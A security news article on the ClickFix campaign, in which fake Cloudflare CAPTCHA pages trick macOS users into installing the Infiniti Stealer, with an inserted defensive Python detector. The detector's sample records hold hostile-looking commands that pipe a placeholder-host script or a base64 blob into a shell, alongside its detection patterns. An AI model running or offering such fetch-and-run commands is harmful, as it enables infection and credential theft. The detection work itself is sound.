Attackers Deploy 'ClickFix' Exploit via Fake Cloudflare Pages
Security researchers at GoPlus Security and Malwarebytes have uncovered a new campaign deploying the 'Infiniti Stealer' malware against macOS users. The attack vector relies on a social engineering method known as 'ClickFix'. Users are presented with a convincing, but fake, Cloudflare CAPTCHA page that instructs them to run a command in their Mac's Terminal to prove they are human.
Executing this command initiates the infection chain. A Bash script is downloaded and run, which in turn fetches the primary malware payload. This technique, previously common in attacks against Windows users, has now been effectively adapted to target the Mac user base, signaling a tactical shift by cybercriminals toward what many perceive as a more secure operating system.
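The step a defender can most easily observe in this chain is the one the fake CAPTCHA page asks the victim to perform: a command pasted into Terminal that fetches remote content and feeds it straight into a shell. The following Python detector is an added example (not code from the article, GoPlus Security or Malwarebytes) that scores recorded terminal commands for that pattern. It assumes a feed of commands typed in terminal sessions (shell history, a preexec audit hook or a terminal-session monitor) with the hosting application name attached; the record fields, the allowlist and the sample commands are constructed for illustration.

```python
"""ClickFix-style Terminal abuse detector for recorded macOS shell commands.

Added example, not the article's or the researchers' code. It inspects
commands executed inside a terminal emulator and flags the ones that
download remote content and run it directly, or decode a base64 blob
into a shell, which is what a fake CAPTCHA "prove you are human" page
asks the victim to do.  Field names and sample data are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Applications a person pastes commands into (constructed list; extend as needed).
TERMINAL_APPS = {"Terminal", "iTerm2"}
SHELLS = {"sh", "bash", "zsh"}

# Hosts from which a "download and run" installer is expected in your fleet.
# Constructed allowlist: tune it to cut noise instead of disabling the rule.
ALLOWED_INSTALL_HOSTS = {"raw.githubusercontent.com"}

# curl/wget followed (within the same pipeline stage) by a URL; group 3 is the host.
RE_FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*?(https?://([^/\s\"']+))", re.I)
# "... | bash", "... | sudo sh", "... | zsh"
RE_PIPE_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")
# 'bash -c "$(curl ...)"' style command substitution
RE_SUBST_SHELL = re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")
# "base64 -d | sh" (macOS base64 accepts -d, -D and --decode)
RE_DECODE_PIPE = re.compile(
    r"\bbase64\s+(-d|-D|--decode)\b\s*\|\s*(sudo\s+)?(ba|z)?sh\b")


@dataclass
class ShellCommand:
    app: str       # terminal application hosting the session
    shell: str     # interactive shell that ran the command
    cmdline: str   # full command line as typed/recorded
    user: str


@dataclass
class Finding:
    command: ShellCommand
    reasons: List[str] = field(default_factory=list)


def analyse(cmd: ShellCommand) -> List[str]:
    """Return the reasons a command looks like ClickFix execution, or [] if none."""
    if cmd.app not in TERMINAL_APPS or cmd.shell not in SHELLS:
        return []
    reasons: List[str] = []
    fetch = RE_FETCH.search(cmd.cmdline)
    host = fetch.group(3).lower() if fetch else None
    if fetch and host not in ALLOWED_INSTALL_HOSTS:
        if RE_PIPE_SHELL.search(cmd.cmdline):
            reasons.append(f"remote script from {host} piped into a shell")
        elif RE_SUBST_SHELL.search(cmd.cmdline):
            reasons.append(f"remote script from {host} run via sh -c \"$(...)\"")
    if RE_DECODE_PIPE.search(cmd.cmdline):
        reasons.append("base64-decoded payload piped into a shell")
    return reasons


def find_clickfix(commands: List[ShellCommand]) -> List[Finding]:
    """Run analyse() over a batch and keep only the commands with findings."""
    return [Finding(c, r) for c in commands if (r := analyse(c))]


# Constructed sample records; the .invalid domain is a placeholder, not a real IoC.
SAMPLE_COMMANDS = [
    ShellCommand("Terminal", "zsh",
                 "curl -fsSL https://verify.example.invalid/check.sh | bash", "alice"),
    ShellCommand("Terminal", "zsh",
                 "echo aGVsbG8= | base64 -d | sh", "alice"),
    ShellCommand("Terminal", "bash",
                 '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/'
                 'Homebrew/install/HEAD/install.sh)"', "bob"),
    ShellCommand("Terminal", "zsh", "git pull --rebase", "bob"),
]

if __name__ == "__main__":
    for f in find_clickfix(SAMPLE_COMMANDS):
        print(f"[{f.command.user}] {f.command.cmdline}\n    -> {'; '.join(f.reasons)}")
```

The allowlist is the part that needs local tuning: a legitimate installer such as Homebrew's uses the same "fetch and run" shape, so the rule scopes on the download host rather than on the shape alone. Because a single process-exec event never shows the whole pipeline (the shell forks `curl` and `bash` separately), the detector expects the full command line from a shell-level source rather than from per-process exec telemetry.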
Infiniti Stealer Targets Wallets and Keychain Credentials
Once executed, the 'Infiniti Stealer' payload systematically seeks to exfiltrate valuable data. The malware is specifically coded to locate and steal information from browser credential stores, the central macOS Keychain, and files associated with cryptocurrency wallets. The collected data is then sent to a remote command-and-control (C&C) server through HTTP POST requests, and a notification is sent to the attackers via a Telegram channel.
To complicate detection and analysis, the malware is compiled using Nuitka, a tool that translates Python source into C and builds a native binary, so the original Python code is not present as readable bytecode. This makes static analysis by security tools more difficult. The emergence of this sophisticated stealer highlights an escalating risk for cryptocurrency holders on macOS, putting pressure on both users and wallet providers to enhance security measures beyond default operating system protections.